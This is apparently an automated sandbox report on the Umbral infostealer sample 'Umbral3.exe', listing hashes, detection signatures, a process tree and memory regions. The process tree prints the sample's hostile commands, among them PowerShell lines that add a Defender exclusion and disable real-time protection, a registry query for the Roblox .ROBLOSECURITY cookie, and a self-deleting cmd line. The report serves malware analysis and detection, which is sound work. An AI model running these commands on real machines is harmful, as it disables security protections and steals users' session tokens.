Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-04-2024 13:10

General

  • Target

    Umbral3.exe

  • Size

    229KB

  • MD5

    7a902c87a60986f18a6b097712299256

  • SHA1

    2c01906a39faa9d27a41e0d3cd84e92410b9c483

  • SHA256

    e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

  • SHA512

    c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

  • SSDEEP

    6144:tloZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmi:voZRL+EP8DDUgoOJBiLHaIJtMQI

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Views/modifies file attributes
      PID:296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1952
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:828
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1536
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2820
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1724
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • Runs ping.exe
          PID:2800

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      4c3dada670799e9495dd6c1b6e6814be

      SHA1

      102d41dbc2ae9e1ceba8b3674d4ed7ce1093ea9d

      SHA256

      4e5fb77e235bca233d56f18bae4d353d864fa70c74cb8403e059974a73b27f40

      SHA512

      9e222c7efcba8858a324056f7e37a9b1d9cc893a4d35171718545a2de480376830f8ee14beb0efe28c811ff11d2a8c4b75348602e89e5a6d0ab1cc0a675a3c09

    • memory/2604-8-0x00000000022D0000-0x00000000022D8000-memory.dmp

      Filesize

      32KB

    • memory/2604-13-0x0000000002910000-0x0000000002990000-memory.dmp

      Filesize

      512KB

    • memory/2604-15-0x000007FEEDAA0000-0x000007FEEE43D000-memory.dmp

      Filesize

      9.6MB

    • memory/2604-9-0x000007FEEDAA0000-0x000007FEEE43D000-memory.dmp

      Filesize

      9.6MB

    • memory/2604-10-0x0000000002910000-0x0000000002990000-memory.dmp

      Filesize

      512KB

    • memory/2604-11-0x000007FEEDAA0000-0x000007FEEE43D000-memory.dmp

      Filesize

      9.6MB

    • memory/2604-12-0x0000000002910000-0x0000000002990000-memory.dmp

      Filesize

      512KB

    • memory/2604-7-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

      Filesize

      2.9MB

    • memory/2604-14-0x0000000002910000-0x0000000002990000-memory.dmp

      Filesize

      512KB

    • memory/2820-50-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

    • memory/2932-0-0x00000000008C0000-0x0000000000900000-memory.dmp

      Filesize

      256KB

    • memory/2932-2-0x000000001B180000-0x000000001B200000-memory.dmp

      Filesize

      512KB

    • memory/2932-1-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp

      Filesize

      9.9MB

    • memory/2932-54-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp

      Filesize

      9.9MB

    • memory/3044-21-0x000000001B5B0000-0x000000001B892000-memory.dmp

      Filesize

      2.9MB

    • memory/3044-22-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB